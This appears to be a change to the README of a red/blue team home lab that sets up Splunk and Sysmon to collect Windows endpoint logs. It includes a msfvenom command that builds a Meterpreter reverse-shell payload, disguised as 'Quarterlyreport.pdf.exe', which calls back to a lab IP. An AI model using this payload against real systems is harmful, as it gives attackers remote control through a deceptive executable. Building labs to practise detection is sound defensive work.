AdrianAgulto/Red-Blue-Team-Splunk-Lab/README.md

 For Splunk configuration, I installed the Sysmon add-on and created the "endpoint" index.
 Our Sysmon config file will point to the index we created by its name, allowing Sysmon to send logs to our Splunk instance

-###KALI SETUP###
+<h6>KALI SETUP<h6/>

   To create telemetry from our Kali VM to our Windows VM, we are going to use the well-known Metasploit pentesting tool.
 We will start by creating the Malware payload with this command: msfvenom -p windows/x64/meterpreter_reverse_tcp lhost-192.168.33.3 -f exe Quarterlyreport.pdf.exe
 -p chooses the payload we want to use provided by the Metasploit tool.
 "lhost", determines which IP this reverse shell payload will remote back to when executed.